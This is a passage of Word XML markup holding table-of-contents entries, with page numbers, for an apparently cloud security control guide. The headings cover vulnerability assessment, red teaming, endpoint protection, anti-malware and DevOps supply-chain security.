        <w:p w14:paraId="61C488F4" w14:textId="571F7823" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449551" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-5: Perform vulnerability assessments</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449551 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>158</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BC6DF71" w14:textId="4EF34255" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449552" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediate using risk-based prioritization</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449552 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2776D3FC" w14:textId="1076CB48" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449553" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-6: Rapidly and automatically remediate vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449553 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14AF2D89" w14:textId="04C4AB83" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449554" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-7: Conduct regular red team operations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449554 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F72A315" w14:textId="46DF0FD1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449555" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Endpoint Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449555 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BE72CF5" w14:textId="0A71F209" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449556" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cloud endpoint threat protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449556 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EB45BB1" w14:textId="6951AAD8" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449557" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ES-1: Use Endpoint Detection and Response (EDR)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449557 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="282E60FB" w14:textId="07B1FE1C" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449558" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ES-2: Use modern anti-malware software</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449558 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>172</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="164B4232" w14:textId="6725D5A1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449559" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cloud Endpoint Security Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449559 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="603736CD" w14:textId="4F847E8B" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449560" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ES-3: Ensure anti-malware software and signatures are updated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449560 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="413E50FB" w14:textId="37DADD0E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449561" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DevOps Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EB5865A" w14:textId="773DAACA" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449562" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure the design and supply chain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64EFE403" w14:textId="5F8D73B0" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449563" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DS-1: Conduct threat modeling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="620B4591" w14:textId="10740ED1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449564" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DS-2: Secure the software supply chain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6578BCE4" w14:textId="0D5E7AD4" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449565" w:history="1">
